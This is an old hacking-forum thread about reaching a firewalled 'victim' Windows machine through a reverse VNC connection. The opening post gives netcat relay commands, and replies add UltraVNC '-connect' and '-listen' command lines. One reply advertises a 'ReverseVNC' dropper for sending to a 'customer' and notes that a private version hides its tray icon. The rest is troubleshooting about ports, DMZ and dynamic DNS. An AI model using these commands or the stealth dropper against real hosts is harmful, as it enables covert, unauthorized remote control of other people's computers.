Here you have a very simple method to establish an inside-out
connection from a natted/firewalled victim host to the attacker...
Nothing new...maybe, the possibily to have a nice interactive session
with the support of VNC... useful on Windows boxes ;-) "I love NetCat"

Just look at this:

Victim(private IP) ------ Firewall ------ (Internet) ------ Attacker(public IP)

1) VNC server listening on port 134 (victim)
2) nc -l -p 5900 | nc -l -p 80 (attacker)
3) nc IP_attacker 80 | nc localhost 134 (victim)
4) VNC client connecting to localhost 5900 (attacker)

1: Start the VNC server on the victim host listenning on some port
(I like 134).
2: Start netcat on the attacker host listenning on port 5900 and pipe
to other netcat listenning on port 80
3: Launch a netcat on the victim host to the IP of the attacker on port 80
and pipe to a netcat listenning on the same machine on port 134
4: Start the VNC client on attacker machine and connect to localhost
on port 5900


This is how the connection is established:

The VNC client of the attacker connects to the port 5900 of its machine,
a netcat listenning on that port receives the connection and pipe its output
to the input of another netcat on the same machine listenning on port 80.
When a netcat on the victim machine connects to the attacker machine on port 80
receives by this socket the output of the VNC client and pipes it to the input
of another netcat on the victim machine that is conneted to the VNC server on
port 134.

Infohacking Research 2001

Please no anitmated signitures

nice stuff... but what flavour of VNC did u use to test?
using UltraVnc u can use the viewer n the server only to establish a reverse connection. Using the command line parameters available in UltraVNC :

vncviewer -listen 12345 (your machine)

%comspec% /c start winvnc & winvnc -connect your_machine_IP 12345 (target machine)

DuDu I did what you suggested and it didn't work. Over my LAN it worked, but when I do it over from a non-LAN prompt, my listener doesn't recieve the connection. I am DMZ'ed, so it should work :/

Any ideas?

http://www.qxbbs.org/viewtopic.php?t=33046...dca8ae0e7bfb752

er that doesn't help me at all - unless im missing something in the (i assume) chinese text

my problem has to be on my end because it works locally, thus there is a problem with recieving the inbound connection from the remote vnc

ReverseVNC 1.0

-------------------------------------------------------------------------------------------
239kb VNC dropper that will have the vnc server connectback to you on the ip::port you set.
good for tech who need to remotely administrate a client who is behind a router.
not really a trojan because the person will see the tray icon and you moving their mouse :/
-------------------------------------------------------------------------------------------
get the tight vnc viewer http://www.tightvnc.com/download.html
set it to listen vncviewer -listen
make sure you have the appropriate port forwarded on your router

open the editor.exe
[...] browse for the server
read the settings
input your ip::port (make sure u have :
write new settings
send to customer

things u might think are bugs:
omg it shows the icon in the system tray!!! , yea so what the priv version will have the icon removed

as I understand u re behind a LAN and wants to receive a connection from the outside (WAN) . u must access your router settings and open the port(s) u want to receive the connection. for example if u choose port 85 , then everyone will be able to direct connect to you on port 85, so u will be able to receive the connection from vnc or any other application:

vnc -listen 85 (on your computer)

run winvnc on the target computer.

now run vnc with this parameter: winvnc -connect Your_computer_IP 85

I have successfully done the above with ULTRA VNC .
Notice that your machine IP is not your LAN IP like 192.168.123.123, it is your external IP, the one given by your ISP. the best here is setting up an account at dyndns or no-ip and install the client update software. what they will do is update your IP address constantly so that people who tries to connect using the name u setup there will be redirected to your IP address n u wont have to care about IP addresses anymore. Also make sure your ISP doesnt block any ports.

I thought that enabling DMZ on my router for my computers LAN IP would open all ports for both TCP and UDP?



I know the difference between my external IP and my LAN IP :] but thanks for the suggestion. and my ISP doesn't block any port :/

LOL! Good find persona!

Quicksilk, it is appropriate to give credit to the original author if this is not your own writings...And if you copied it down and have no idea where/from whom you got it, it's safest to say so then people won't think you are taking credit for their hard work.... If that's your work then nevermind

Is anybody else not having any luck with this??

The setup:

Running a RealVNC server on a XP SP2 box and connecting with vncviewer from a fedora 4 box in a LAN. Firewalls and other security settings all off.

The netcat channels do get establshed but when I try connecting vncviewer to listening XP host on port x, I get nothing. Anybody have any suggestions?

use UltraVnc... it supports reverse connection, no need to use third parties tools

great info m8s !

Could someone reupload?

Thanks

if u can do all that, y not just use pushvnc?

why revive such an old topic to say a thks like post ?